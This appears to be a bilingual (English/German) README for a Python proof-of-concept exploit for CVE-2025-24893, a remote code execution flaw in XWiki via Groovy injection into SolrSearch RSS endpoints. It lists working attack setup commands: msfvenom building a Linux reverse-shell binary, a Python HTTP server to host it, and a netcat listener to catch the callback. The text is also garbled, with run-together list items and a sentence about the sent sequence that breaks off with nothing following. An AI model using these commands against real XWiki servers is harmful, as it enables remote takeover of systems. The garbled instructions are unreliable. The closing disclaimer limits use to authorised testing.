
PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
Dieses Python-Skript nutzt CVE-2025-24893, eine Remote-Code-Ausführungslücke (RCE) in XWiki aus, die durch unzureichende Sandboxing in asynchron gerenderten Groovy-Makros verursacht wird. Es ermöglicht die Ausführung beliebiger Befehle durch Einschleusung in RSS-basierte SolrSearch-Endpunkte.
msfvenom)Klonen oder herunterladen des Skripts.
Stellen Sie sicher, dass Folgendes installiert ist:
msfvenom von Metasploitjq (wird in den Bash-Payloads verwendet)Führen Sie das Skript aus:
python3 CVE-2025-24893-PoC.py
Wählen Sie aus dem Menü:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
Das Skript sendet die folgende Sequenz an das Ziel:
Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.